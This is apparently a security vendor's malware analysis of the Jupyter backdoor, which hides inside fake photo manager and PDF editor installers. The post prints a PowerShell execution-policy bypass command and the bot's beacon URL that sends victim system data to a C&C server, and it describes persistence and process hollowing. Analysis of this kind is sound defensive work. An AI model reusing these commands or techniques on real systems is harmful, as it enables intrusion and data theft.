19 February 2021  —  Acronis

Jupyter backdoor deploys under the guise of photo manager and PDF editor installation

Acronis Cyber Protect Cloud
for service providers

Summary

  • Masquerades as a legitimate Inno Setup installer of different legitimate software such as MAGIX Photo Manager Deluxe and Soda PDF
  • Malware binary is signed with the digital certificate that was issued to the Russian company ITM LLC
  • Communicates with the C&C server located in Russia
  • Can download executables and Powershell scripts from the C&C server
  • Establishes persistence via Startup folder
  • Uses Process Hollowing technique to inject its code into system tool msinfo32.exe

Installation

Once executed, the malicious installer asks to elevate privileges for MAGIX Photo Manager Deluxe:

The executed file has the following attributes:

The dropped executable has the following attributes:

The dropped file is signed with a valid digital signature. The certificate belongs to ITM LLC, a Russian IT company from the Krasnodar region:

It should be noted, that another sample (SHA256: 79ab214c60b04d7570b8759a1ada8542665f1c129f33d1c0be693c3e2c8a4a07), disguised as the Soda PDF 11 application installer, is signed with an identical digital signature.

Serial number: 11 39 db b0 27 76 fa 0f 0c 0d f3 0b

‎Thumbprint: 21 5a 9c 6d 77 58 f1 88 50 51 ba 63 be 51 12 7a f7 ec aa 41

After starting, it creates a directory with a random name in the temporary files directory. For example:

%Temp%\is-11KLJ.tmp

and extracts itself into the following folder:

%Temp%\is-11KLJ.tmp\<self_name>.tmp (SHA256:5e0170f3b5fe2bb6bd86458ca371c97175aecf21476692a0e64915403407410e)

The dropped second-stage installer (Inno Setup Installer) is detected by 1 out of 70 engines (https://www.virustotal.com/gui/file/5e0170f3b5fe2bb6bd86458ca371c97175aecf21476692a0e64915403407410e/detection).

It then creates a new Inno Setup Installer launch process with no digital signature or product name, ‘MAGIX Photo Manager DLM Trial’:

%Temp%\is-11KLJ.tmp\<self_name>.tmp /SL5="$F037A,4811181,780800,<original_file_path>

As a result, the second installer extracts from the original file a Powershell script and a file called “solarmarker.dat” that contains a unique identifier in the% AppData% folder, executing this code:

%AppData%\<md5_hash>.ps1

%AppData%\solarmarker.dat

Then, the PS script executes:

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass "%AppData%\<md5_hash>.ps1"

After that, the script disappears.

Persistence and backdoor loading

The malicious script randomly generates file names with four, 32, and 52 characters using upper and lowercase letters of the Latin alphabet. For example:

nuzqYGMlhjOSCaWXREogZevyFHTbJVmAptxdIwNifPQLBKcsDrkU

XkgK

It then saves the encrypted data in the body of the script to a file named:

%AppData%\<rnd_52_letters>

In this case, the data gets stored in BYTE encoding:

After that, it creates a “CMD” command file, from which the Trojan reads the data:

%AppData%\<rnd_52_letters>[KS1] 

It subsequently decrypts and launches the data directly into the memory of .Net application processes by dynamically loading memory-only modules through the Assembly.Load (byte []) function.

It does not create a file on the disk. The batch file stores as:

$env:aPPdAta\<32_rnd_letters>.CMd

The CMD file starts a PowerShell application with the options for hiding the main window and bypassing the script blocking:

The malicious script creates an “lnk” file and saves it into the Startup folder as a persistent mechanism. Thus, the backdoor’s CMD script gets executed during the next system boot up:

$enV:APPDATA\micrOsoFt\wiNDOwS\STarT mEnU\pRoGRaMS\startuP\<4_rnd_letters>.LNk

After that, the malware decrypts the .Net application into the memory and launches it without dropping it to the disk. The decryption key is hardcoded in the body of the script.

Communication with C&C server

The decrypted file is a dynamic .Net version of “DN-DN / 4.1” of the Jupyter backdoor.

MD5: E6BE295D56AFCF3A3B58135D7B4DEECB

SHA1: 840ACE8D78C26F9F04E64B079B5B4C8388A62825

CPU: 32-bit

Size: 57344 bytes

Type: Dynamic-link library

SubSystem: Windows Console

Virustotal detects:  31/68 (https://www.virustotal.com/gui/file/df302678c754abd7ce294081792fc16a866617b3620d916ae86d21fbda2accb0/detection)

The code is obfuscated using junk code. For example:

            Thread thread1 = new Thread(() => {

                double num = 84.2826654687218;

                Math.Log(num * num - -95.5549441323236);

                Thread.Sleep(Math.Abs(9244) / 1000000);

            });

            thread1.Start();

            thread1.Join();

and

            double num8 = -52.0298714032042;

            Math.Tan(num8 / (num8 + 16.5730083411731));

            Thread.Sleep(Math.Abs(-379) / 1000000);

            double num9 = 90.0767023393983;

            Math.Cos(num9 * num9 + 41.841080733992);

            Math.Cos(27.9869714699515);

The bot sends information about the victim’s computer to the attacker’s C&C server and receives one of three commands and a payload to execute.

The C&C server is located in Russia.

The bot first collects the following information:

  • Unique HWID (data from file %AppData%\solarmarker.dat)
  • Computer name
  • Windows OS version
  • OS bitness (x64/x86)
  • Windows Administrators group rights
  • Working group name
  • Bot version

The received data is formatted as follows:

{"hwid":"HWID_STR","pn":"COMPUTER_NAME","os":"Windows 7","x":"x64","prm":"Admin","ver":"DN-DN/4.1","wg":"WORKGROUP"}

And then converts the given string to a byte array:

7B2268776964223A22485749445F535452222C22706E223A22434F4D50555445525F4E414D45222C226F73223A2257696E646F77732037222C2278223A22783634222C2270726D223A2241646D696E222C22766572223A22444E2D444E2F342E31222C227767223A22574F524B47524F5550227D

It then sends data to the C&C server via HTTPS:

hххps://vincentolife.com/gate?q=7B2268776964223A22485749445F535452222C22706E223A22434F4D50555445525F4E414D45222C226F73223A2257696E646F77732037222C2278223A22783634222C2270726D223A2241646D696E222C22766572223A22444E2D444E2F342E31222C227767223A22574F524B47524F5550227D

In response, the bot receives one of the following commands from the server  - “rpe," “dnr,” or “psp.”

RPE command

The bot downloads an array of bytes from the C&C server and decrypts it with XOR 17.

The malware launches a system utility:

C:\windows\system32\msinfo32.exe

Using the Process Hollowing technique, the Jupyter bot injects its code downloaded from the attacker’s server and transfers control. As a result, the attacker’s code gains system privileges. The following code snippet implements the Process Hollowing techniques:

Process Hollowing is a method of executing arbitrary code in the address space of a separate live process. It usually creates a process in a suspended state, then unmaps/hollows its memory, which can then be replaced with malicious code. Process Hollowing is very similar to the Thread Local Storage technique but creates a new process rather than targeting an existing process. [KS2] 

Execution via process hollowing may also evade detection from security products since it masks execution under a legitimate process. That is why it is important for security products to detect this type of attack method. As you will see, Acronis Cyber Protect successfully detects Process Hollowing attacks.

 

DNR command

The malware downloads a file from the C&C server, stores it in the Temp folder under the name:

%Temp%\<rnd_24_symb>.exe

And executes it:

PSP command

The malware downloads a PowerShell script from the attacker’s server and stores it in the Temp folder under the name:

%Temp%\<rnd_24_symb>.ps1

Then the bot launches the script, hides the main window, and bypasses the script execution block:

After that, the script file disappears.

Acronis Detection Capabilities

Acronis Cyber Cloud (Active Protection module) detects Jupyter ransomware:

Conclusion

Jupyter is a sophisticated backdoor, supposedly by a Russian threat actor, used to deliver cyberespionage and malware such as ransomware. It employs sophisticated techniques to evade detection and escalate privileges, such as Process Hollowing, Digital Certificates, and obfuscated PowerShell scripts. Attackers create software bundles with known software under the guise of installing legal software to install the backdoor and gain initial access and execution.

About Acronis

A Swiss company founded in Singapore in 2003, Acronis has 15 offices worldwide and employees in 50+ countries. Acronis Cyber Protect Cloud is available in 26 languages in 150 countries and is used by over 20,000 service providers to protect over 750,000 businesses.

More from Acronis